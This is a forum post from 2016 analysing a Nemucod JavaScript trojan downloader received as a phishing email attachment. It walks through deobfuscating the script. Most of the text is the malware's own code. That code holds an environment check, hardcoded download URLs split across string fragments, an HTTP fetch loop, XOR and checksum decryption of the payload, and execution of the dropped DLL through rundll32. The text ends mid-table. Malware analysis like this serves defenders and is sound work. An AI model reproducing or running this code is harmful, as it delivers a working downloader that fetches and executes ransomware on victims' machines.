Malware Analysis: New fresh sample I received: JS/TrojanDownloader.Nemucod.ASX - 26_08_2016

DardiM (Thread author, Level 26, joined May 14, 2016, 1,597 posts)
office_equipment ~40f5dde9

Mail received (testing account for waves)

"Dear DardiM,

Please sign the attached purchase of the office equipment. We will send you back the receipt afterward.

Best regards,

Sergio Camacho

Sales Manager"

I will only talk about the script; this is not an analysis of the ransomware.

I submitted it to Hybrid Analysis; here is the result:
https://www.hybrid-analysis.com/sam...391b5b044d5cb81c88a1feeb057?environmentId=100
It saw nothing, no infection: normal, I forgot to delete my comment parts and put the eval call back :p

The Penguin is exhausted ...:oops:

Right file submitted - right analysis done this time - Threat Score: 100/100 :
https://www.hybrid-analysis.com/sam...7a873e5597a4dc163dd23e071c1?environmentId=100

On Virus total :

14 / 55 (at last edit)
JS/TrojanDownloader.Nemucod.ASX
https://www.virustotal.com/en/file/...1be9f8a77a873e5597a4dc163dd23e071c1/analysis/

In fact, the script is very similar to :


With a very different first obfuscation method, followed by some "small" modifications.

1) Main obfuscation :

function d(){
var _wds = "WS"+"cr"+"ipt";
var _c = "\%S"+"ystemRoot\%\\system32\\cmd."+"ex"+"e";
var _zds = this[_wds]["CreateObject"](_wds+".Shell");
var se = _zds["E"+"n"+"vironmen"+"t"]("S"+"Y"+"S"+"TEM");
var _dd = se("ComSpe"+"c");
if (_dd == _c) {return 1;}
else {WScript.Quit(1);
};
}
d();

var Ql = new Array("\x66"+"","\x75"+"","\x6e"+"","\x63"+"","\x74"+"","\x69"+"","\x6f"+"","\x20"+"","\x64"+"","\x28"+"","\x29"+"","\x7b"+"","\x0a"+"","\x76"+"","\x61"+"","\x72"+"","\x5f"+"","\x77"+"","\x73"+"","\x3d"+"","\x22"+"","\x57"+"","\x53"+"","\x2b"+"","\x70"+"","\x3b"+"","\x5c"+"","\x25"+"","\x79"+"","\x65"+"","\x6d"+"","\x52"+"","\x33"+"","\x32"+"","\x2e"+"","\x78"+"","\x7a"+"","\x68"+"","\x5b"+"","\x5d"+"","\x43"+"","\x4f"+"","\x62"+"","\x6a"+"","\x6c"+"","\x45"+"","\x59"+"","\x54"+"","\x4d"+"","\x31"+"","\x7d"+"","\x09"+"","\x51"+"","\x44"+"","\x49"+"","\x0d"+"","\x42"+"","\x48"+"","\x30"+"","\x46"+"","\x56"+"","\x67"+"","\x37"+"","\x4c"+"","\x50"+"","\x4a"+"","\x71"+"","\x4e"+"","\x38"+"","\x41"+"","\x5a"+"","\x47"+"","\x55"+"","\x35"+"","\x34"+"","\x36"+"","\x4b"+"","\x58"+"","\x39"+"","\x6b"+"","\x2c"+"","\x2f"+"","\x3a"+"","\x2d"+"","\x3c"+"","\x2a"+"","\x7c"+"","\x3e"+"","\x21"+"","\x5e"+"","\x26");
var Ci8 = [0/1,1/1,2/1,3/1,4/1,5/1,6/1,2/1,7/1,8/1,9/1,10/1,11/1,12/1,7/1,7/1,7/1,7/1,13/1,14/1,15/1,7/1,16/1,17/1,8/1,18/1,7/1,19/1,7/1,20/1,21/1,22/1,20/1,23/1,20/1,3/1,15/1,20/1,23/1,20/1,5/1,24/1,4/1,20/1,25/1,12/1,7/1,7/1,7/1,7/1,13/1,14/1,15/1,7/1,16/1,3/1,7/1,19/1,7/1,20/1,26/1,27/1,22/1,20/1,23/1,20/1,28/1,18/1,4/1,29/1,30/1,31/1,6/1,6/1,4/1,26/1,27/1,26/1,26/1,18/1,28/1,18/1,4/1,29/1,30/1,32/1,33/1,26/1,26/1,3/1,30/1,8/1,34/1,20/1,23/1,20/1,29/1,35/1,20/1,23/1,20/1,29/1,20/1,25/1,12/1,7/1,7/1,7/1,7/1,13/1,14/1,15/1,7/1,16/1,36/1,8/1,18/1,7/1,19/1,7/1,4/1,37/1,5/1,18/1,38/1,16/1,17/1,8/1,18/1,39/1,38/1,20/1,40/1,15/1,29/1,14/1,4/1,29/1,41/1,42/1,43/1,29/1,3/1,4/1,20/1,39/1,9/1,16/1,17/1,8/1,18/1,23/1,20/1,34/1,22/1,37/1,29/1,44/1,44/1,20/1,10/1,25/1,12/1,7/1,7/1,7/1,7/1,13/1,14/1,15/1,7/1,18/1,29/1,7/1,19/1,7/1,16/1,36/1,8/1,18/1,38/1,20/1,45/1,
...
...
/1,42/1,7/1,23/1,7/1,47/1,31/1,0/1,39/1,9/1,10/1,25/1,55/1,12/1,50/1,25];

var Hp = '';
for (var SSg=0; SSg < Ci8.length; SSg++)
{
Hp = Hp.concat(Ql[Ci8[SSg]]);
}
eval(Hp);

2) First deobfuscation :

Var Ql: new Array, decoding the \x values => unescaped chars:
=>
("f"+"","u"+"","n"+"","c"+"","t"+"","i"+"","o"+""," "+"","d"+"","("+"",")"+"","{"+"","
"+"","v"+"","a"+"","r"+"","_"+"","w"+"","s"+"","="+"","""+"","W"+"","S"+"","+"+"","p"+"",";"+"","\"+"","%"+"","y"+"","e"+"","m"+"","R"+"","3"+"","2"+"","."+"","x"+"","z"+"","h"+"","["+"","]"+"","C"+"","O"+"","b"+"","j"+"","l"+"","E"+"","Y"+"","T"+"","M"+"","1"+"","}"+""," "+"","Q"+"","D"+"","I"+"","
"+"","B"+"","H"+"","0"+"","F"+"","V"+"","g"+"","7"+"","L"+"","P"+"","J"+"","q"+"","N"+"","8"+"","A"+"","Z"+"","G"+"","U"+"","5"+"","4"+"","6"+"","K"+"","X"+"","9"+"","k"+"",","+"","/"+"",":"+"","-"+"","<"+"","*"+"","|"+"",">"+"","!"+"","^"+"","&");​

var Ci8:
all the "/1" parts can be removed: each number is simply divided by 1

Ci8 = [0 , 1 , 2 , 3, 4 , 5, 6, 2, 7 , 8 , 9 , 10 , 11 , 12, 7 , 7 , 7 , 7 , ...............]

for (var SSg=0; SSg < Ci8.length; SSg++)
{
Hp = Hp.concat(Ql[Ci8[SSg]]);
}

=> Ci8: contains the indexes of the Ql chars to substitute => the decipher method

Hp :

Result : the code "less" obfuscated.

Example :

0 => f
1 => u
2 => n
3 => c
4 => t
5 => i
6 => o
2 => n
7 => blank char

A funny part :

The beginning of this first deobfuscation is, once again, the same code as at the beginning of the script: lol

function d(){
var _wds = "WS"+"cr"+"ipt";
var _c = "\%S"+"ystemRoot\%\\system32\\cmd."+"ex"+"e";
var _zds = this[_wds]["CreateObject"](_wds+".Shell");
var se = _zds["E"+"n"+"vironmen"+"t"]("S"+"Y"+"S"+"TEM");
var _dd = se("ComSpe"+"c");
if (_dd == _c) {return 1;}
else {WScript.Quit(1);};
}
d();

=> so, once the real part is built: this function and the d() call appear 2 times :rolleyes:

What is the aim of this function ?
Verify that the script is run on a system where %SystemRoot%\system32\cmd.exe is available (the environment property "ComSpec" is retrieved and compared)

var WshShell = WScript.CreateObject("WScript.Shell");
var WshSysEnv = WshShell.Environment("SYSTEM");

'The WshEnvironment object is a collection of environment variables that is returned by the WshShell object's Environment property. This collection contains the entire set of environment variables (those with names and those without). To retrieve individual environment variables (and their values) from this collection, use the environment variable name as the index'.
Here : "ComSpec"

WshSysEnv("ComSpec")

=> %SystemRoot%\system32\cmd.exe

At the end of the function, if the two strings are different, it quits.
To remove the first obfuscation:

eval(Hp); => evaluates the string => for analysis, eval removed :p
=> Hp will be a String with all the parts

3) After first deobfuscation :

Long part, but afterwards it only needs some var concatenation / replacement
function d(){
var _wds = "WS"+"cr"+"ipt";
var _c = "\%S"+"ystemRoot\%\\system32\\cmd."+"ex"+"e";
var _zds = this[_wds]["CreateObject"](_wds+".Shell");
var se = _zds["E"+"n"+"vironmen"+"t"]("S"+"Y"+"S"+"TEM");
var _dd = se("ComSpe"+"c");
if (_dd == _c) {return 1;}
else {WScript.Quit(1);};
}
d();
var DIl = "ose" + "";
var TBh = "cl" + "";
var Hu = "ile" + "";
var Br0 = "oF" + "";
var Vg7 = "SaveT" + "";
var DLg = "Text" + "";
var Py = "write" + "";
var JCq = "n" + "";
var PNp = "ope" + "";
var PQe8 = "rset" + "";
var By8 = "Cha" + "";
var NTs8 = "type" + "";
var EDi = "am" + "";
var HVj3 = "re" + "";
var AHp = "St" + "";
var Md0 = "DB." + "";
var Qg = "O" + "";
var Qh = "D" + "";
var VYl = "A" + "";
var Wg3 = "ct" + "";
var ZVf1 = "eObje" + "";
var Ll = "Creat" + "";
var GPy = "join" + "";
var VUe5 = "e" + "";
var St2 = "arCod" + "";
var NEh0 = "Ch" + "";
var GPe8 = "from" + "";
var Wp = "th" + "";
var Re5 = "leng" + "";
var PIj = "sh" + "";
var Re = "pu" + "";
var Yd7 = "t" + "";
var Oz8 = "deA" + "";
var Jy = "arCo" + "";
var Ha = "ch" + "";
var CJj4 = "gth" + "";
var BWt3 = "len" + "";
var JHm = "e" + "";
var Ru = "clos" + "";
var JMd2 = "xt" + "";
var TUo = "adTe" + "";
var Vi6 = "Re" + "";
var Dx5 = "le" + "";
var Hs = "romFi" + "";
var Cv7 = "adF" + "";
var Dy6 = "Lo" + "";
var UOv = "open" + "";
var Kp = "t" + "";
var XQg1 = "se" + "";
var Lf = "Char" + "";
var APo0 = "e" + "";
var UEs = "typ" + "";
var Uo1 = "am" + "";
var IId = "tre" + "";
var Zp5 = "DB.S" + "";
var JVp2 = "O" + "";
var Dx3 = "D" + "";
var MHl3 = "A" + "";
var PFd9 = "ject" + "";
var NKk = "eOb" + "";
var QSt = "eat" + "";
var ITb = "Cr" + "";
var VIz = "th" + "";
var VOy4 = "leng" + "";
var XVu = "h" + "";
var MJt = "gt" + "";
var Kk7 = "len" + "";
var Xu7 = "ice" + "";
var JGk = "spl" + "";
var XUy3 = "h" + "";
var DOz = "lengt" + "";
var Fg5 = "gth" + "";
var NIw = "len" + "";
var QOe = "th" + "";
var Xq9 = "leng" + "";
var NMu = "th" + "";
var ZXd6 = "leng" + "";
var Sp3 = "h" + "";
var Aq7 = "gt" + "";
var Rr3 = "len" + "";
var Pz4 = "eep" + "";
var Ep = "Sl" + "";
var OCv5 = "3" + "";
var Jh = "y 32" + "";
var Uj = "ert" + "";
var Cp = ",qw" + "";
var Jw = " " + "";
var Ao = "Run" + "";
var Yo2 = "th" + "";
var Gs9 = "leng" + "";
var Uy = "h" + "";
var Il = "lengt" + "";
var TRf = "e" + "";
var Ab = "clos" + "";
var Gh5 = "File" + "";
var Cz = "eTo" + "";
var KIy6 = "Sav" + "";
var LMj = "n" + "";
var WXl8 = "sitio" + "";
var Yq = "po" + "";
var Wz = "y" + "";
var Td7 = "Bod" + "";
var Si = "onse" + "";
var NVt = "Resp" + "";
var PYg = "write" + "";
var WKs3 = "type" + "";
var CLc0 = "en" + "";
var Ya0 = "op" + "";
var Sq1 = "m" + "";
var Da7 = "trea" + "";
var YSd7 = "DB.S" + "";
var NIo1 = "O" + "";
var Gv7 = "D" + "";
var Ma7 = "A" + "";
var Pv3 = "ct" + "";
var Of2 = "eObje" + "";
var Md = "Creat" + "";
var Co = "p" + "";
var BBw = "ee" + "";
var Qw = "Sl" + "";
var ZKp = "send" + "";
var WZg = "th" + "";
var LVk = "ng" + "";
var Nr = "le" + "";
var Oc6 = "GET" + "";
var Wb = "open" + "";
var XHm = "gth" + "";
var EYq = "len" + "";
var He = "Quit" + "";
var Go7 = "ript" + "";
var Dx = "WSc" + "";
var Bb5 = "ts" + "";
var Zg = "xis" + "";
var VQd = "FileE" + "";
var Ka9 = ".txt" + "";
var FXl8 = "s" + "";
var Vn = "ist" + "";
var Va = "Ex" + "";
var Js = "File" + "";
var VGj1 = "t" + "";
var Yy5 = "jec" + "";
var GIy0 = "emOb" + "";
var Hk7 = "st" + "";
var AHq = "leSy" + "";
var Lx2 = ".Fi" + "";
var Ny6 = "ing" + "";
var ZHe = "pt" + "";
var Fj0 = "Scri" + "";
var Cg7 = "ct" + "";
var Ae = "je" + "";
var ZSf8 = "teOb" + "";
var Op0 = "Crea" + "";
var Tl5 = "h" + "";
var HXh4 = "lengt" + "";
var Kk2 = ".1" + "";
var GXj = "est.5" + "";
var Ey7 = "equ" + "";
var CMz6 = "HttpR" + "";
var PWd = "in" + "";
var Ww0 = "tp.W" + "";
var Bx5 = "WinHt" + "";
var Cl1 = "TTP" + "";
var QZf7 = "XMLH" + "";
var KKr2 = "ML2." + "";
var NAp9 = "MSX" + "";
var ABx = "/" + "";
var DQo = "9+" + "";
var BFi = "45678" + "";
var HNn0 = "0123" + "";
var Yu0 = "wxyz" + "";
var FHs = "stuv" + "";
var Gf = "pqr" + "";
var Fi = "no" + "";
var OQa = "klm" + "";
var Ps = "fghij" + "";
var UWj = "bcde" + "";
var AKs8 = "WXYZa" + "";
var YHq9 = "RSTUV" + "";
var IVg3 = "OPQ" + "";
var EDd = "KLMN" + "";
var UXu0 = "GHIJ" + "";
var Dv5 = "CDEF" + "";
var Gd1 = "AB" + "";
var Mi0 = "%SystemRoot%\\\\system32\\\\rundll32.exe" + "";
var NLq = "%SystemRoot%\\\\SysWOW64\\\\rundll32.exe" + "";
var XGx = "amd64" + "";
var HSu1 = "TURE" + "";
var DEa = "ITEC" + "";
var JBs8 = "CH" + "";
var Ht0 = "_AR" + "";
var HYu2 = "OR" + "";
var Ex1 = "SS" + "";
var SIq = "PROCE" + "";
var ZPt = "m" + "";
var Bp2 = "te" + "";
var Ds = "Sys" + "";
var GIf = "ll" + "";
var Fb = ".d" + "";
var Es0 = "Ggw" + "";
var ZLu = "gsGc" + "";
var IZr = "ooSns" + "";
var Fq = "P%/" + "";
var Nj = "%TEM" + "";
var KTx = "l" + "";
var Pi2 = "Shel" + "";
var BZr = "ript." + "";
var GBg = "WSc" + "";
var GNu0 = "ect" + "";
var Jz = "teObj" + "";
var Cd = "Crea" + "";
var BCt = "2ictp" + "";
var Vx = "g/" + "";
var Gj = ".wan" + "";
var Ai0 = "y7" + "";
var ZVf0 = "ad" + "";
var XIa = "l" + "";
var Tp5 = "rano" + "";
var Qq = "sop" + "";
var LOi = "//" + "";
var TTu = "http:" + "";
var NAj = "pe" + "";
var Tp7 = "fhs" + "";
var GPw = "sl" + "";
var BUu7 = "t/" + "";
var Of3 = "ne" + "";
var Nc = "o." + "";
var Tf9 = "i" + "";
var Ea4 = "br" + "";
var ZDn = "li" + "";
var YDg7 = "ui" + "";
var Os = "eq" + "";
var Oz0 = "ado" + "";
var Ag = "ci" + "";
var Ei3 = "ssen" + "";
var Tn = "e" + "";
var QXr = "//" + "";
var XBm = "tp:" + "";
var Ah = "ht" + "";
var IYq0 = "1s5" + "";
var Hl = "ut" + "";
var Af1 = "eu/" + "";
var So = "at." + "";
var Sq6 = "im" + "";
var AYc8 = "e" + "";
var YOv7 = ".h" + "";
var LLy5 = "e" + "";
var Br2 = "rag" + "";
var Cn = "-of-" + "";
var MQh7 = "lm" + "";
var SJa = "ea" + "";
var Ai2 = "p://r" + "";
var Vu0 = "htt" + "";
var JPy = "yg2" + "";
var Ke = "40" + "";
var Wk = "/g" + "";
var Vq = "om" + "";
var Za2 = ".c" + "";
var Kb3 = "e" + "";
var LTh = "ttl" + "";
var MEw1 = "o" + "";
var YXv5 = "xb" + "";
var Ch = "ati" + "";
var DSx = "qu" + "";
var QSu = "://a" + "";
var Dk7 = "p" + "";
var Tj4 = "htt" + "";
var EBb = "cb" + "";
var ULs4 = "v07t7" + "";
var OHi6 = ".68/" + "";
var Hk = "29" + "";
var Ka6 = ".1" + "";
var KFg2 = "26" + "";
var Jj = "2." + "";
var Yq8 = "://21" + "";
var CHu1 = "tp" + "";
var Yc = "ht" + "";
var Ai = "437" + "";
var SQk2 = "ngth" + "";
var TAh2 = "le" + "";
var QGx4 = "m" + "";
var WMm = "mmmm" + "";
var Ji = "mmmmm" + "";
var IOf = "mmm" + "";
var WMf = "mm" + "";
var KKc5 = "mmmm" + "";
var Wd8 = "mmmmm" + "";
var DZa = "mmmm" + "";
var Ap8 = "fd" + "";
var Yu = "sdfas" + "";
var FEo3 = "asfa" + "";
var HAj = "th" + "";
var Zc = "leng" + "";
var HJs = "m" + "";
var YRz = "mm" + "";
var Vo3 = "mmmm" + "";
var HEk4 = "mmmm" + "";
var Pm2 = "mmmmm" + "";
var OXa = "mmmm" + "";
var PAj0 = "mm" + "";
var Sq = "mm" + "";
var Wh8 = "mmm" + "";
var AGf5 = "mmm" + "";
var ZIv = "mmmmm" + "";
var Ht4 = "mmmmm" + "";
var Pe = "mmmm" + "";
var FLt = "mmmmm" + "";
var JFt3 = "mmmmm" + "";
var NRs4 = "mm" + "";
var Fp = "h" + "";
var ETi8 = "lengt" + "";
var Pp9 = "mmm" + "";
var FOt = "mmm" + "";
var RCp2 = "mmmm" + "";
var Un = "mmmmm" + "";
var LKr = "mmmmm" + "";
var JFa2 = "mmmmm" + "";
var Bl8 = "mm" + "";
var Dd2 = "mmmmm" + "";
var NPu2 = "mmmm" + "";
var Is1 = "mm" + "";
var NNc0 = "132" + "";
var Kx0 = "1123" + "";
var Hw = (Kx0 + NNc0, Is1 + NPu2 + Dd2 + Bl8 + JFa2 + LKr + Un + RCp2 + FOt + Pp9);
var Uv = Hw[ETi8 + Fp];
var WBe = (NRs4 + JFt3 + FLt + Pe + Ht4 + ZIv + AGf5 + Wh8 + Sq + PAj0 + OXa + Pm2 + HEk4 + Vo3 + YRz + HJs);
var IVi2 = 753887;
var Uw = WBe[ETi8 + Fp];
var MOk3 = (FEo3 + Yu + Ap8, DZa + Wd8 + KKc5 + WMf + IOf + Ji + WMm + QGx4);
var Ma6 = MOk3[ETi8 + Fp];

var Yz = 2871 - 2870;
var AJf = 2;
var IDz0 = 2;
var Hn = "437";

var IGv7 = [Yc + CHu1 + Yq8 + Jj + KFg2 + Ka6 + Hk + OHi6 + ULs4 + EBb, Tj4 + Dk7 + QSu + DSx + Ch + YXv5 + MEw1 + LTh + Kb3 + Za2 + Vq + Wk + Ke + JPy, Vu0 + Ai2 + SJa + MQh7 + Cn + Br2 + LLy5 + YOv7 + AYc8 + Sq6 + So + Af1 + Hl + IYq0, Ah + XBm + QXr + Tn + Ei3 + Ag + Oz0 + Os + YDg7 + ZDn + Ea4 + Tf9 + Nc + Of3 + BUu7 + GPw + Tp7 + NAj, Ah + XBm + LOi + Qq + Tp5 + XIa + ZVf0 + Ai0 + Gj + Vx + BCt];
var Xl3 = WScript[Cd + Jz + GNu0](GBg + BZr + Pi2 + KTx);
var XWe = Xl3.ExpandEnvironmentStrings(Nj + Fq);
var NQf6 = XWe + IZr + ZLu + Es0;
var Nt5 = NQf6 + Fb + GIf;

var Vu = Xl3.Environment(Ds + Bp2 + ZPt);
if (Vu(SIq + Ex1 + HYu2 + Ht0 + JBs8 + DEa + HSu1).toLowerCase() == "amd64") {
var UFn4 = Xl3.ExpandEnvironmentStrings(NLq);
} else {
var UFn4 = Xl3.ExpandEnvironmentStrings(Mi0);
}

function uheprng(Ww) {
return (function() {
var seed = Ww;
var o = 48,
c = 1,
p = o,
s = new Array(o);
var i, j;
var base64chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
var mash = Mash();
for (i = 0; i < o; i++) s = mash(seed);
mash = null;
var random = function(range) {
return Math.floor(range * (rawprng() + (rawprng() * 0x200000 | 0) * 1.1102230246251565e-16));
}

function rawprng() {
if (++p >= o) p = 1 * 0;
var t = 1768863 * s[p] + c * 2.3283064365386963e-10;
return s[p] = t - (c = t | 0);
}
return random;
}());
};

function Mash() {
var n = 0xefc8249d;
var mash = function(data) {
if (data) {
data = data.toString();
for (var i = 0; i < data.length; i++) {
n += data.charCodeAt(i);
var h = 0.02519603282416938 * n;
n = h >>> 0;
h -= n;
h *= n;
n = h >>> 0;
h -= n;
n += h * 0x100000000;
}
return (n >>> 0) * 2.3283064365386963e-10;
} else n = 0xefc8249d;
};
return mash;
}

var SPz0 = [NAp9 + KKr2 + QZf7 + Cl1, Bx5 + Ww0 + PWd + CMz6 + Ey7 + GXj + Kk2];

for (var Lp9 = 0; Lp9 < SPz0[ETi8 + Fp]; Lp9++) {
try {
var MBi0 = WScript[Cd + Jz + GNu0](SPz0[Lp9]);
break;
} catch (e) {
continue;
}
};

var OPr3 = "";
var fso = new ActiveXObject(Fj0 + ZHe + Ny6 + Lx2 + AHq + Hk7 + GIy0 + Yy5 + VGj1);

var MTm6 = uheprng(Math.random().toString());
var ENa6 = 1;
do {
if (fso[Js + Va + Vn + FXl8](Nt5)) {
var Em = fso.GetFile(Nt5);
var DAb4 = Em.ShortPath;
OPr3 = DAb4 + Ka9;
if (fso[Js + Va + Vn + FXl8](OPr3)) {
this[Dx + Go7][He](824 - 824);
}
}

var HFw3 = MTm6(IGv7[ETi8 + Fp]);

try {
if (1 == ENa6) {
MBi0[Wb](Oc6, IGv7[HFw3++ % IGv7[ETi8 + Fp]], false);
MBi0[ZKp]();
}

if (MBi0.readystate < 4) {
WScript[Qw + BBw + Co](100);
continue;
}

var Nf = WScript[Cd + Jz + GNu0](Ma7 + Gv7 + NIo1 + YSd7 + Da7 + Sq1);
Nf[Wb]();
Nf[WKs3] = Yz;
Nf[PYg](MBi0[NVt + Si + Td7 + Wz]);
Nf[Yq + WXl8 + LMj] = 0;
Nf[KIy6 + Cz + Gh5](NQf6, IDz0);
Nf[Ab + TRf]();

var CJf2 = OMb(NQf6);
CJf2 = HIi(CJf2);
if (CJf2[ETi8 + Fp] < 100 * 1024 || CJf2[ETi8 + Fp] > 230 * 1024 || !XHw6(CJf2)) {
ENa6 = 1;
continue;
}
try {
IGi2(Nt5, CJf2);
} catch (e) {
break;
};

var Em = fso.GetFile(Nt5);
var DAb4 = Em.ShortPath;

Xl3[Ao](UFn4 + Jw + DAb4 + Cp + Uj + Jh + OCv5);
WScript.Sleep(3000);
} catch (e) {
WScript[Qw + BBw + Co](1000);
continue;
};
} while (ENa6);

WScript.Quit(0);

function HIi(JEc3) {
var TIk;

var ELs = uheprng(
REMOVED_TO_PROTECT_YOU);
for (var Lp9 = 0; Lp9 < JEc3[ETi8 + Fp]; Lp9++) {
JEc3[Lp9] ^= ELs(256);
}

var Zm6 = JEc3[JEc3[ETi8 + Fp] - 4] | JEc3[JEc3[ETi8 + Fp] - 3] << 8 | JEc3[JEc3[ETi8 + Fp] - 2] << 16 | JEc3[JEc3[ETi8 + Fp] - 1] << 24;
JEc3[JGk + Xu7](CJf2[ETi8 + Fp] - 4, 4);

TIk = Uv;
for (var Lp9 = 0; Lp9 < JEc3[ETi8 + Fp]; Lp9++) {
TIk = (TIk + JEc3[Lp9]) % 0x100000000;
};
if (TIk != Zm6) {
return [];
};

return JEc3;
};


function XHw6(JEc3) {
if (JEc3[0] == 0x4D && JEc3[1] == 0x5a) {

return true;
} else {
return false;
}
};


function OMb(Nq) {

var QAl8 = WScript[Cd + Jz + GNu0](Ma7 + Gv7 + NIo1 + YSd7 + Da7 + Sq1);
QAl8[WKs3] = AJf;
QAl8[Lf + XQg1 + Kp] = Hn;
QAl8[Wb]();
QAl8[Dy6 + Cv7 + Hs + Dx5](Nq);
var Fm = QAl8[Vi6 + TUo + JMd2];
QAl8[Ab + TRf]();
return St(Fm);
};


function St(IBx3) {

var Vi5 = new Array();

Vi5[199] = 50 * 2 + 28;
Vi5[252] = 129;
Vi5[233] = 130;
Vi5[226] = 9737 - 9606;
Vi5[228] = 132;
Vi5[224] = 133;
Vi5[229] = 134;
Vi5[231] = 135;
Vi5[33 * 7 + 3] = 136;
Vi5[6873 - 6638] = 9263 - 9126;
Vi5[232] = -1483 + 1621;
Vi5[239] = 4882 - 4743;
Vi5[238] = 7993 - 7853;
Vi5[236] = 141;
Vi5[196] = 142;
Vi5[197] = -261 + 404;
Vi5[201] = 144;
Vi5[230] = 145;
Vi5[198] = 6355 - 6209;
Vi5[-6198 + 6442] = 147;
Vi5[-4163 + 4409] = 148;
Vi5[242] = 149;
Vi5[251] = 150;
Vi5[249] = 151;
Vi5[255] = 152;
Vi5[7046 - 6832] = 153;
Vi5[5708 - 5488] = 154;
Vi5[162] = 155;
Vi5[163] = 156;
Vi5[165] = 32 * 4 + 29;
Vi5[8359] = 158;
Vi5[402] = 159;
Vi5[225] = 160;
Vi5[6218 - 5981] = 161;
Vi5[243] = -7644 + 7806;
Vi5[250] = 163;
Vi5[5038 - 4797] = 164;
Vi5[209] = 165;
Vi5[170] = 166;
Vi5[186] = 167;
Vi5[191] = 168;
Vi5[8976] = 1933 - 1764;
Vi5[172] = 170;
Vi5[189] = -1595 + 1766;
Vi5[188] = 58 * 2 + 56;
Vi5[9861 - 9700] = 173;
Vi5[171] = 174;
Vi5[9639 - 9452] = 175;
Vi5[1057 * 9 + 104] = 37 * 4 + 28;
Vi5[9618] = -2836 + 3013;
Vi5[9619] = 178;
Vi5[9474] = 179;
Vi5[9508] = 180;
Vi5[9569] = 181;
Vi5[17395 - 7825] = 182;
Vi5[9558] = 183;
Vi5[9557] = 3196 - 3012;
Vi5[1279 + 8292] = 185;
Vi5[9553] = 186;
Vi5[9559] = 71 * 2 + 45;
Vi5[9565] = 188;
Vi5[3243 * 2 + 3078] = 189;
Vi5[9563] = 190;
Vi5[9488] = 191;
Vi5[9492] = 192;
Vi5[9524] = 193;
Vi5[9516] = 194;
Vi5[9500] = 195;
Vi5[9472] = 196;
Vi5[17570 - 8038] = 5 * 39 + 2;
Vi5[9566] = 198;
Vi5[9567] = 199;
Vi5[9562] = 200;
Vi5[9556] = 201;
Vi5[9577] = 202;
Vi5[9574] = 203;
Vi5[9568] = 204;
Vi5[9552] = 205;
Vi5[9580] = 206;
Vi5[9575] = 207;
Vi5[9576] = 208;
Vi5[2030 * 4 + 1452] = -2543 + 2752;
Vi5[9573] = 210;
Vi5[9561] = 211;
Vi5[9560] = 212;
Vi5[9554] = -7618 + 7831;
Vi5[9555] = 214;
Vi5[9579] = 215;
Vi5[9578] = 216;
Vi5[9496] = -2183 + 2400;
Vi5[9484] = 218;
Vi5[7422 + 2186] = 219;
Vi5[9604] = 220;
Vi5[2068 * 4 + 1340] = 10158 - 9937;
Vi5[9616] = 222;
Vi5[9600] = 223;
Vi5[945] = 224;
Vi5[69 * 3 + 16] = 225;
Vi5[5015 - 4100] = 226;
Vi5[960] = 227;
Vi5[-6443 + 7374] = 228;
Vi5[963] = 229;
Vi5[5321 - 5140] = 230;
Vi5[964] = 908 - 677;
Vi5[-7390 + 8324] = 232;
Vi5[920] = 233;
Vi5[5628 - 4691] = 234;
Vi5[7495 - 6547] = 104 * 2 + 27;
Vi5[9421 - 687] = 78 * 3 + 2;
Vi5[966] = 237;
Vi5[949] = 10003 - 9765;
Vi5[8745] = 239;
Vi5[4107 + 4694] = 240;
Vi5[-8510 + 8687] = 5178 - 4937;
Vi5[629 * 13 + 628] = 242;
Vi5[8804] = 243;
Vi5[8992] = 6450 - 6206;
Vi5[8993] = -7303 + 7548;
Vi5[247] = 246;
Vi5[8776] = 247;
Vi5[176] = 248;
Vi5[8729] = 249;
Vi5[183] = 250;
Vi5[8730] = 251;
Vi5[8319] = 252;
Vi5[178] = 253;
Vi5[9632] = 254;
Vi5[160] = 255;

var CJf2 = new Array();
for (var Lp9 = 0; Lp9 < IBx3[ETi8 + Fp]; Lp9++) {
var El = IBx3[Ha + Jy + Oz8 + Yd7](Lp9);
if (El < 128) {
var Lj4 = El;
} else {
var Lj4 = Vi5[El];
}
CJf2[Re + PIj](Lj4);
};

return CJf2;
};


function Kx1(JEc3) {

var Io = new Array();

Io[128] = 15 * 13 + 4;
Io[129] = 252;
Io[-2277 + 2407] = 233;
Io[131] = 226;
Io[-1834 + 1966] = 228;
Io[133] = 224;
Io[1769 - 1635] = 229;
Io[135] = 231;
Io[136] = 234;
Io[137] = 78 * 3 + 1;
Io[138] = 232;
Io[139] = 239;
Io[140] = 238;
Io[141] = 236;
Io[142] = 196;
Io[143] = 197;
Io[144] = 201;
Io[145] = 230;
Io[146] = 198;
Io[46 * 3 + 9] = 244;
Io[148] = 246;
Io[149] = 242;
Io[117 + 33] = 4170 - 3919;
Io[-1899 + 2050] = 249;
Io[152] = 255;
Io[153] = 93 * 2 + 28;
Io[-5752 + 5906] = 10 * 22;
Io[61 * 2 + 33] = 5897 - 5735;
Io[156] = 1376 - 1213;
Io[157] = 165;
Io[158] = 8359;
Io[1784 - 1625] = 65 * 6 + 12;
Io[160] = 225;
Io[161] = 84 * 2 + 69;
Io[162] = 243;
Io[24 * 6 + 19] = 250;
Io[164] = 5946 - 5705;
Io[165] = 13 * 16 + 1;
Io[166] = 170;
Io[167] = 186;
Io[168] = 191;
Io[169] = 8976;
Io[170] = 172;
Io[171] = 189;
Io[172] = 188;
Io[173] = 161;
Io[174] = 171;
Io[175] = 51 * 3 + 34;
Io[8426 - 8250] = 9617;
Io[177] = 9618;
Io[178] = 11785 - 2166;
Io[179] = 3796 * 2 + 1882;
Io[-6284 + 6464] = 13737 - 4229;
Io[181] = 9569;
Io[-8301 + 8483] = 9570;
Io[183] = 6199 + 3359;
Io[184] = 9557;
Io[185] = 9571;
Io[186] = 9553;
Io[187] = 9559;
Io[18 * 10 + 8] = 9565;
Io[43 * 4 + 17] = 9564;
Io[21 * 9 + 1] = 2506 * 3 + 2045;
Io[-4034 + 4225] = 15634 - 6146;
Io[192] = 2698 * 3 + 1398;
Io[-5681 + 5874] = 9524;
Io[194] = 9516;
Io[2693 - 2498] = 9500;
Io[196] = 9472;
Io[15 * 13 + 2] = 9532;
Io[198] = 9566;
Io[199] = 9567;
Io[95 * 2 + 10] = 9562;
Io[201] = 9556;
Io[202] = 9577;
Io[1126 - 923] = 9574;
Io[69 * 2 + 66] = 9568;
Io[205] = 508 * 18 + 408;
Io[206] = 9580;
Io[-6813 + 7020] = 9575;
Io[10080 - 9872] = 9576;
Io[209] = 9572;
Io[210] = 2671 + 6902;
Io[211] = 8842 + 719;
Io[212] = 9487 + 73;
Io[5300 - 5087] = 3300 + 6254;
